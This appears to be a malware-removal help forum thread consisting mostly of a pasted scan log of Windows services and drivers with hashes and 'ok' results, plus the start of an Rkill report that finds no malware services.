17:32:48.0002 0x1b50 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll

17:32:48.0062 0x1b50 KtmRm - ok

17:32:48.0102 0x1b50 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\System32\srvsvc.dll

17:32:48.0162 0x1b50 LanmanServer - ok

17:32:48.0214 0x1b50 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll

17:32:48.0284 0x1b50 LanmanWorkstation - ok

17:32:48.0376 0x1b50 [ C2E324014D54DAA2B5A4DE47CB696FD8, 10D4A6ACBC194ABDFAD8C94DC4742DEA056177A2B8706494A13EBF7C23C87D21 ] LightScribeService C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe

17:32:48.0386 0x1b50 LightScribeService - detected UnsignedFile.Multi.Generic ( 1 )

17:32:58.0506 0x1b50 LightScribeService ( UnsignedFile.Multi.Generic ) - warning

17:32:58.0506 0x1b50 Force sending object to P2P due to detect: LightScribeService

17:32:59.0798 0x1b50 Object send P2P result: true

17:33:00.0068 0x1b50 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys

17:33:00.0148 0x1b50 lltdio - ok

17:33:00.0178 0x1b50 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll

17:33:00.0248 0x1b50 lltdsvc - ok

17:33:00.0268 0x1b50 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll

17:33:00.0298 0x1b50 lmhosts - ok

17:33:00.0348 0x1b50 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\DRIVERS\lsi_fc.sys

17:33:00.0368 0x1b50 LSI_FC - ok

17:33:00.0378 0x1b50 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\DRIVERS\lsi_sas.sys

17:33:00.0398 0x1b50 LSI_SAS - ok

17:33:00.0418 0x1b50 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\DRIVERS\lsi_sas2.sys

17:33:00.0428 0x1b50 LSI_SAS2 - ok

17:33:00.0458 0x1b50 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\DRIVERS\lsi_scsi.sys

17:33:00.0478 0x1b50 LSI_SCSI - ok

17:33:00.0508 0x1b50 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys

17:33:00.0548 0x1b50 luafv - ok

17:33:00.0578 0x1b50 [ 78488AF2AB2111D67B3C4044707A519B, 7AA71B9C4C7949A1A21F60EF7CCEDE0079794990696B60557B5DC86F4D47223A ] MBAMSwissArmy C:\Windows\system32\drivers\MBAMSwissArmy.sys

17:33:00.0658 0x1b50 MBAMSwissArmy - ok

17:33:00.0708 0x1b50 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll

17:33:00.0758 0x1b50 Mcx2Svc - ok

17:33:00.0778 0x1b50 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\DRIVERS\megasas.sys

17:33:00.0798 0x1b50 megasas - ok

17:33:00.0828 0x1b50 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\DRIVERS\MegaSR.sys

17:33:00.0858 0x1b50 MegaSR - ok

17:33:00.0938 0x1b50 Microsoft SharePoint Workspace Audit Service - ok

17:33:00.0968 0x1b50 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll

17:33:01.0038 0x1b50 MMCSS - ok

17:33:01.0058 0x1b50 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys

17:33:01.0118 0x1b50 Modem - ok

17:33:01.0158 0x1b50 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys

17:33:01.0178 0x1b50 monitor - ok

17:33:01.0208 0x1b50 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys

17:33:01.0218 0x1b50 mouclass - ok

17:33:01.0238 0x1b50 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys

17:33:01.0268 0x1b50 mouhid - ok

17:33:01.0318 0x1b50 [ 8ADB5445B29941CB41AF2846FD5C93C7, 689582430FE29EC0845B1DB841D3CC49D5D09DE264586E3999EEFE616986D12B ] mountmgr C:\Windows\system32\drivers\mountmgr.sys

17:33:01.0328 0x1b50 mountmgr - ok

17:33:01.0408 0x1b50 [ D57B7C101A8216E7769B14645AFEB276, 38BF427F81589173D3CD823A7BD3CA84B0FADD6747467E7AEADB72D1F4E1404B ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

17:33:01.0538 0x1b50 MozillaMaintenance - ok

17:33:01.0638 0x1b50 [ 3665AB2F67F4024F5F3F80335ED5322A, BE3DC246F176E00D7611A7E16FBC22615199F49EBCB4C90B0C107294E592BF8D ] MpFilter C:\Windows\system32\DRIVERS\MpFilter.sys

17:33:01.0678 0x1b50 MpFilter - ok

17:33:01.0718 0x1b50 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys

17:33:01.0738 0x1b50 mpio - ok

17:33:01.0758 0x1b50 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys

17:33:01.0798 0x1b50 mpsdrv - ok

17:33:01.0858 0x1b50 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll

17:33:01.0948 0x1b50 MpsSvc - ok

17:33:01.0988 0x1b50 [ 98DB1790F0A584E0A2528B92B052417F, 9AA04CA73AFE599810CD233B9CEC212E16D44DCEDF5C7D0181C7257F498068B5 ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys

17:33:02.0098 0x1b50 MRxDAV - ok

17:33:02.0138 0x1b50 [ 819426D736BCBD31CC7CA27221954E04, 0C4AADEFE282D89EA4A523BDA7B6BB948247F50253D7D0B90C8FC46C4DEEF835 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys

17:33:02.0238 0x1b50 mrxsmb - ok

17:33:02.0268 0x1b50 [ 85CB449B319AF69A3538BB1B97EEA2E5, DB75D56A7E631F57D31957105422811C738E96E5B84480C3346B827ACF280E12 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys

17:33:02.0328 0x1b50 mrxsmb10 - ok

17:33:02.0348 0x1b50 [ C0B2DC34587FE163997055AA38EB883A, A0BFD0CF873CCEF266606ADE1A4DA69DF757A67D8AD28330272AFEABD7F481D5 ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys

17:33:02.0388 0x1b50 mrxsmb20 - ok

17:33:02.0418 0x1b50 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys

17:33:02.0428 0x1b50 msahci - ok

17:33:02.0468 0x1b50 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys

17:33:02.0488 0x1b50 msdsm - ok

17:33:02.0508 0x1b50 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe

17:33:02.0528 0x1b50 MSDTC - ok

17:33:02.0568 0x1b50 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys

17:33:02.0638 0x1b50 Msfs - ok

17:33:02.0658 0x1b50 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys

17:33:02.0708 0x1b50 mshidkmdf - ok

17:33:02.0738 0x1b50 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys

17:33:02.0768 0x1b50 msisadrv - ok

17:33:02.0808 0x1b50 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll

17:33:02.0868 0x1b50 MSiSCSI - ok

17:33:02.0868 0x1b50 msiserver - ok

17:33:02.0898 0x1b50 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys

17:33:02.0948 0x1b50 MSKSSRV - ok

17:33:03.0048 0x1b50 [ 5ADED2C1239D7BD798E2C4EF9EAA1FA3, 6A462DAC110015F3E59610202714120C557674019A0196680B72031C50D7C474 ] MsMpSvc c:\Program Files\Microsoft Security Client\MsMpEng.exe

17:33:03.0078 0x1b50 MsMpSvc - ok

17:33:03.0088 0x1b50 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys

17:33:03.0128 0x1b50 MSPCLOCK - ok

17:33:03.0138 0x1b50 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys

17:33:03.0198 0x1b50 MSPQM - ok

17:33:03.0248 0x1b50 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys

17:33:03.0268 0x1b50 MsRPC - ok

17:33:03.0288 0x1b50 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys

17:33:03.0298 0x1b50 mssmbios - ok

17:33:03.0308 0x1b50 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys

17:33:03.0368 0x1b50 MSTEE - ok

17:33:03.0398 0x1b50 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\DRIVERS\MTConfig.sys

17:33:03.0428 0x1b50 MTConfig - ok

17:33:03.0448 0x1b50 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys

17:33:03.0458 0x1b50 Mup - ok

17:33:03.0518 0x1b50 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll

17:33:03.0568 0x1b50 napagent - ok

17:33:03.0598 0x1b50 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys

17:33:03.0638 0x1b50 NativeWifiP - ok

17:33:03.0738 0x1b50 [ F7309F42555F8AAB7144A51A1F2585B0, 065277A8AFAEE3888C997A76D2F751070F92DF4C3354D16B194860B4BDAFF937 ] NDIS C:\Windows\system32\drivers\ndis.sys

17:33:03.0788 0x1b50 NDIS - ok

17:33:03.0818 0x1b50 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys

17:33:03.0868 0x1b50 NdisCap - ok

17:33:03.0908 0x1b50 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys

17:33:03.0958 0x1b50 NdisTapi - ok

17:33:03.0998 0x1b50 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys

17:33:04.0048 0x1b50 Ndisuio - ok

17:33:04.0098 0x1b50 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys

17:33:04.0168 0x1b50 NdisWan - ok

17:33:04.0198 0x1b50 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys

17:33:04.0248 0x1b50 NDProxy - ok

17:33:04.0328 0x1b50 [ D5AC41AE382738483FAFFBD7E373D49A, 68793D15566F387650E9C5010E1CA73BDE3EB4BA431EA0A1673004CAE08413B0 ] Net Driver HPZ12 C:\Windows\system32\HPZinw12.dll

17:33:04.0358 0x1b50 Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )

17:33:04.0538 0x1b50 Detect skipped due to KSN trusted

17:33:04.0538 0x1b50 Net Driver HPZ12 - ok

17:33:04.0558 0x1b50 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys

17:33:04.0628 0x1b50 NetBIOS - ok

17:33:04.0678 0x1b50 [ E47D571FEC2C76E867935109AB2A770C, F349D25890B6F476B106FD75BFB081DB737CA9B224D95E44927942FFF2DF82CD ] NetBT C:\Windows\system32\DRIVERS\netbt.sys

17:33:04.0768 0x1b50 NetBT - ok

17:33:04.0788 0x1b50 [ CA69E856332E2D85294665F6B7E97254, A9693F836907FB0154DC1090D9476F1E9242ABE922D932D74D0385772D2EAB65 ] Netlogon C:\Windows\system32\lsass.exe

17:33:04.0808 0x1b50 Netlogon - ok

17:33:04.0838 0x1b50 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll

17:33:04.0898 0x1b50 Netman - ok

17:33:04.0938 0x1b50 [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

17:33:04.0958 0x1b50 NetMsmqActivator - ok

17:33:04.0978 0x1b50 [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

17:33:04.0988 0x1b50 NetPipeActivator - ok

17:33:05.0018 0x1b50 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll

17:33:05.0088 0x1b50 netprofm - ok

17:33:05.0098 0x1b50 [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

17:33:05.0118 0x1b50 NetTcpActivator - ok

17:33:05.0128 0x1b50 [ 0BEF1F19F32C9F3DBE9A503F2E66CC22, 4F4812CDDB675C5D655B5B90375F188A3A5AA52A2BC2CED383B03449CF8210C8 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

17:33:05.0138 0x1b50 NetTcpPortSharing - ok

17:33:05.0428 0x1b50 [ E72F4522801FFB8F0456924FB0017BFF, 7260C6D0725D3B3E0083AF06D901073AE8753E6CD97400B2A1D7F6D62A727CC5 ] NETw1v64 C:\Windows\system32\DRIVERS\NETw1v64.sys

17:33:05.0708 0x1b50 NETw1v64 - ok

17:33:06.0028 0x1b50 [ 39EDE676D17F37AF4573C2B33EC28ACA, 6C897C8B72D7AC1385302E58509688790CC5F428E967485F92C3CD646907EF59 ] NETw5s64 C:\Windows\system32\DRIVERS\NETw5s64.sys

17:33:06.0348 0x1b50 NETw5s64 - ok

17:33:06.0608 0x1b50 [ 64428DFDAF6E88366CB51F45A79C5F69, 31187D38C1AB52120A3CB7AC3CE47ED9682AC37B0F06B9A9610C0065DD4E7B13 ] netw5v64 C:\Windows\system32\DRIVERS\netw5v64.sys

17:33:06.0818 0x1b50 netw5v64 - ok

17:33:06.0868 0x1b50 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\DRIVERS\nfrd960.sys

17:33:06.0878 0x1b50 nfrd960 - ok

17:33:06.0928 0x1b50 [ CE5F6E635FE4506AE6F2D6EB87425128, 3DB5ECF7CD2F2C3C010AA40CE57F1B3856E284BBA359FBC41A1B340E3180FD5F ] NisDrv C:\Windows\system32\DRIVERS\NisDrvWFP.sys

17:33:06.0968 0x1b50 NisDrv - ok

17:33:07.0018 0x1b50 [ D630B510E1E3FF6BA12B705F47F115D9, 05D76065D5D9A82E53EA18CD2D0184338681A7BBD3CD5D6C44D1FA5CB1C63640 ] NisSrv c:\Program Files\Microsoft Security Client\NisSrv.exe

17:33:07.0038 0x1b50 NisSrv - ok

17:33:07.0088 0x1b50 [ 8B301D474B478E9A92823BAB50A7BC49, 8181816035F41B1DABEC05E65E4F67BCD785F56760A61F1049E91BA39D42F01D ] NlaSvc C:\Windows\System32\nlasvc.dll

17:33:07.0158 0x1b50 NlaSvc - ok

17:33:07.0198 0x1b50 [ DE7FCC77F4A503AF4CA6A47D49B3713D, 4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6 ] npf C:\Windows\system32\drivers\npf.sys

17:33:07.0258 0x1b50 npf - ok

17:33:07.0288 0x1b50 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs C:\Windows\system32\drivers\Npfs.sys

17:33:07.0328 0x1b50 Npfs - ok

17:33:07.0358 0x1b50 [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi C:\Windows\system32\nsisvc.dll

17:33:07.0408 0x1b50 nsi - ok

17:33:07.0438 0x1b50 [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys

17:33:07.0478 0x1b50 nsiproxy - ok

17:33:07.0568 0x1b50 [ 47B2D0B31BDC3EBE6090228E2BA3764D, 984A4B38300954164BCBF57EC1A09C18B53779E60A26E9618B50E26016735787 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys

17:33:07.0638 0x1b50 Ntfs - ok

17:33:07.0658 0x1b50 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null C:\Windows\system32\drivers\Null.sys

17:33:07.0698 0x1b50 Null - ok

17:33:07.0738 0x1b50 [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid C:\Windows\system32\drivers\nvraid.sys

17:33:07.0758 0x1b50 nvraid - ok

17:33:07.0768 0x1b50 [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor C:\Windows\system32\drivers\nvstor.sys

17:33:07.0788 0x1b50 nvstor - ok

17:33:07.0808 0x1b50 [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp C:\Windows\system32\drivers\nv_agp.sys

17:33:07.0828 0x1b50 nv_agp - ok

17:33:07.0848 0x1b50 [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys

17:33:07.0878 0x1b50 ohci1394 - ok

17:33:07.0978 0x1b50 [ C5ECB0162DDA1D5B6954BEC8D0A5D567, 1174FEA9587B07E5BC658521BF1AC6E1B6835650FAF655B08162E808697D1F69 ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE

17:33:08.0208 0x1b50 ose - detected UnsignedFile.Multi.Generic ( 1 )

17:33:08.0378 0x1b50 ose ( UnsignedFile.Multi.Generic ) - warning

17:33:08.0908 0x1b50 [ FE9C0029E1AF26350D9985D00520E5C8, 967079CCF7B2CBD4B48C9F076675C26AF93A1CEC26C96811F279414E34004EE6 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

17:33:09.0078 0x1b50 osppsvc - ok

17:33:09.0138 0x1b50 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc C:\Windows\system32\pnrpsvc.dll

17:33:09.0208 0x1b50 p2pimsvc - ok

17:33:09.0248 0x1b50 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc C:\Windows\system32\p2psvc.dll

17:33:09.0278 0x1b50 p2psvc - ok

17:33:09.0308 0x1b50 [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport C:\Windows\system32\DRIVERS\parport.sys

17:33:09.0328 0x1b50 Parport - ok

17:33:09.0358 0x1b50 [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr C:\Windows\system32\drivers\partmgr.sys

17:33:09.0368 0x1b50 partmgr - ok

17:33:09.0428 0x1b50 [ 8A0F8A9580D9F2FC512A35D5709088A9, 3385B3FC4120C249ADB20190F4B2FF63A4358D4BE36C507B6300BCAD069F722A ] pavboot C:\Windows\system32\drivers\pavboot64.sys

17:33:09.0448 0x1b50 pavboot - ok

17:33:09.0498 0x1b50 [ 3CD83692C43D87088E85E3C916146FFB, 9E812535E8FBA045FDA30F68E9EB2031132C37721D542A2DC9D4C33E2B137FCF ] PcaSvc C:\Windows\System32\pcasvc.dll

17:33:09.0588 0x1b50 PcaSvc - ok

17:33:09.0648 0x1b50 [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci C:\Windows\system32\drivers\pci.sys

17:33:09.0678 0x1b50 pci - ok

17:33:09.0688 0x1b50 [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide C:\Windows\system32\drivers\pciide.sys

17:33:09.0698 0x1b50 pciide - ok

17:33:09.0728 0x1b50 [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia C:\Windows\system32\DRIVERS\pcmcia.sys

17:33:09.0748 0x1b50 pcmcia - ok

17:33:09.0768 0x1b50 [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw C:\Windows\system32\drivers\pcw.sys

17:33:09.0778 0x1b50 pcw - ok

17:33:09.0818 0x1b50 [ EA4D67448BE493D543F1730D6CD04694, 24717C5E41B7CA522F3330EF2228B6685E710A5259396E9887A1C1E7A413F8CA ] PEAUTH C:\Windows\system32\drivers\peauth.sys

17:33:09.0868 0x1b50 PEAUTH - ok

17:33:09.0968 0x1b50 [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost C:\Windows\SysWow64\perfhost.exe

17:33:10.0018 0x1b50 PerfHost - ok

17:33:10.0108 0x1b50 [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla C:\Windows\system32\pla.dll

17:33:10.0230 0x1b50 pla - ok

17:33:10.0292 0x1b50 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay C:\Windows\system32\umpnpmgr.dll

17:33:10.0382 0x1b50 PlugPlay - ok

17:33:10.0422 0x1b50 [ 37F6046CDC630442D7DC087501FF6FC6, EFC0F3DA49839CA263CD95AE5015F4FC554D9D845A58A699C542C8C96E70ED3C ] Pml Driver HPZ12 C:\Windows\system32\HPZipm12.dll

17:33:10.0442 0x1b50 Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )

17:33:10.0592 0x1b50 Detect skipped due to KSN trusted

17:33:10.0592 0x1b50 Pml Driver HPZ12 - ok

17:33:10.0632 0x1b50 [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg C:\Windows\system32\pnrpauto.dll

17:33:10.0702 0x1b50 PNRPAutoReg - ok

17:33:10.0732 0x1b50 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5B


#18 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 10 April 2017 - 06:24 PM

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingc...opic308364.html

Program started at: 04/10/2017 07:20:09 PM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

